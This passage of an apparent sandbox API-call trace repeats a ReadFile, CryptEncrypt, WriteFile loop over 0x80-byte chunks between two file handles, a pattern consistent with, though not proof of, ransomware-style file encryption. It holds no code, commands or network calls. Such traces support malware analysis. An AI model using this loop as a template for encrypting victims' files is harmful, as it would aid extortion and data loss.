nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.262] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.262] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.263] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.263] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.263] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.263] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.263] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.263] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.263] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.263] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.263] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.264] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.264] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.264] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.264] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.264] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.264] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.264] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.264] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.264] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.265] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.265] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.265] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.265] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.265] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.265] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.265] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.265] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.265] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.266] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.266] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.266] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.266] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.266] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.266] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.266] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.266] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.266] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.267] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.267] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.267] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, 